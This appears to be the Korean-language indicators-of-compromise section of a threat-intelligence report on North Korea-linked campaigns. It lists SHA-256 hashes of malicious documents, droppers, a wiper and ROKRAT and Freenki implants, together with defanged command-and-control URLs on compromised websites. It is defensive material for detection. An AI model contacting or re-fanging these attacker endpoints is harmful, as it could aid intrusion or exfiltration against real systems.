악성문서 sha256: 281828d6f5bd377f91c6283c34896d0483b08ac2167d34e981fbea871893c919설치됨 #1:95192de1f3239d5c0a7075627cf9845c91fd397796383185f61dde893989c08a설치됨 #2:7ebc9a1fd93525fc42277efbccecf5a0470a0affbc4cf6c3934933c4c1959eb1설치됨 #3:6c372f29615ce8ae2cdf257e9f2617870c74b321651e9219ea16847467f51c9f설치됨 #4:19e4c45c0cd992564532b89a4dc1f35c769133167dc20e40b2a41fccb881277b설치됨 #5:3a0fc4cc145eafe20129e9c53aac424e429597a58682605128b3656c3ab0a409설치됨 #6:7d8008028488edd26e665a3d4f70576cc02c237fffe5b8493842def528d6a1d8압축해제됨 #1:7e810cb159fab5baccee7e72708d97433d92ef6d3ef7d8b6926c2df481ccac2f압축해제됨 #1:21b098d721ea88bf237c08cdb5c619aa435046d9143bd4a2c4ec463dcf275cbe
압축해제됨 #1:761454dafba7e191587735c0dc5c6c8ab5b1fb87a0fa44bd046e8495a27850c7압축해제됨 #1:3d442c4457cf921b7a335c0d7276bea9472976dc31af94ea0e604e466596b4e8
압축해제됨 #1:930fce7272ede29833abbfb5df4e32eee9f15443542434d7a8363f7a7b2d1f00압축해제됨 #1:4b20883386665bd205ac50f34f7b6293747fd720d602e2bb3c270837a21291b4
압축해제됨 #1:f080f019073654acbe6b7ab735d3fd21f8942352895890d7e8b27fa488887d08
네트워크:–
www[.]imuz[.]com/admin/data/bbs/review2/board/index.php
– www[.]imuz[.]com/admin/data/bbs/review2/board/123.php
– www[.]imuz[.]com/admin/data/bbs/review2/board/02BC6B26_put.jpg(02BC6B26이임의로생성된위치)–
www[.]wildrush[.]co[.]kr/bbs/data/image/work/webproxy.php
– www[.]wildrush[.]co[.]kr/bbs/data/image/work/02BC6B26_put.jpg(02BC6B26이임의로생성된위치)–
www[.]belasting-telefoon[.]nl//images/banners/temp/index.php– www[.]belasting-telefoon[.]nl//images/banners/temp/02BC6B26_put.jpg(02BC6B26이임의로생성된위치)–
www[.]kgls[.]or[.]kr/news2/news_dir/index.php
– www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg(02BC6B26이임의로생성된위치)
“행복하십니까?”
캠페인:
와이퍼 sha256: 6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd
“FreeMilk” 캠페인:
Office sha256:f1419cde4dd4e1785d6ec6d33afb413e938f6aece2e8d55cf6328a9d2ac3c2d0
HTA sha256: a585849d02c94e93022c5257b162f74c0cdf6144ad82dd7cf7ac700cbfedd84f
JS sha256:1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c
PoohMilk sha256:35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2
Freenki sha256:7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df
Freenki 2016:99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5
네트워크:
–hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]
–
hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg
– hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg
– hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp
–
hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php
“북한인권” 캠페인:
악성문서 sha256:171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824설치됨 #1:a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037설치됨 #2:eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14설치됨 #3:9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493fROKRAT:: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e
“사악한새해 2018년” 캠페인:
악성문서 sha256: f068196d2c492b49e4aae4312c140e9a6c8c61a33f61ea35d74f4a26ef263eadPNG: bdd48dbed10f74f234ed38908756b5c3ae3c79d014ecf991e31b36d957d9c950ROKRAT:3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1
네트워크:
–
hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png
참조
http://blog.talosintelligence.com/2017/02/korean-maldoc.html
http://blog.talosintelligence.com/2017/04/introducing-rokrat.html
https://gblogs.cisco.com/kr/1275?category=408874
Tags:
